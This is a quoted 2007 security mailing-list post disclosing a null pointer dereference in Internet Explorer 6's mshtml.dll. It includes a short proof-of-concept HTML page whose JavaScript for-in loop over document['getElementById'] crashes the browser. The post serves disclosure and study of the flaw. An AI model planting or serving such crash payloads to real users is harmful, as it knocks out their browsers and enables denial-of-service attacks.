Thread-topic: [EXPL] MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Wednesday, February 07, 2007 12:07 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] MS Internet Explorer 6 Null Pointer
> Dereference Exploit (mshtml.dll)
>
> MS Internet Explorer 6 Null Pointer Dereference Exploit (mshtml.dll)
>
>
>
> Microsoft Internet Explorer version 6 crashes when you open
> the attached HTML page; this is due to its attempt to
> dereference a NULL pointer.
>
>
> Vulnerable Systems:
> * Microsoft Internet Explorer version 6.0.2800.1106; SP1 (Windows 2000 Advanced Server)
> * Microsoft Internet Explorer version 6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
>
> Exploit:
> <!--
> + Title: Microsoft Internet Explorer Malformed HTML Null
> Pointer Dereference Vulnerability (mshtml.dll) (0-day)
>
> + Bug discovered & exploit coded by AmesianX in
> powerhacker.net (YoungHo Park - amesianx@xxxxxxxxx)
>
> + Critical: Critical
>
> + Impact: MS Internet Explorer 6 -> Crash (Denial of Service)
>
> + Where: From remote
>
> + Tested Operating System: Windows XP SP2 FULL PATCHED (Korean Language)
>                            Windows 2000 Advanced Server (Korean Language)
>
> + Tested Software: Microsoft Internet Explorer Ver.6.0.2800.1106;SP1 (Windows 2000 Advanced Server)
>                    Microsoft Internet Explorer Ver.6.0.2900.2180.xpsp.050928-1517;SP2 (Windows XP Pro)
>
> + Solution: Not Patched (zero-day)
>
> + Description:
> The following bug was tested on the latest version of
> Internet Explorer 6 on a fully-patched
> Windows XP SP2 system. This bug will crash when executing a
> 'for' script.
>
> + The following proof-of-concept is also available:
> http://www.powerhacker.net/exploit/IE_NULL_CRASH.html
> -->
>
> <html>
> <head>
> <title> AmesianX, RC_No1 in powerhacker.net
> (amesianx@xxxxxxxxx, RC_No1@xxxxxxxxx)</title>
> </head>
> <body>
> <script language='javascript'>
> var data = document['getElementById'];
> for(var key in data);
> </script>
> </body>
> </html>
>
>
> Additional Information:
> The original article can be found at:
> http://www.milw0rm.com/exploits/3272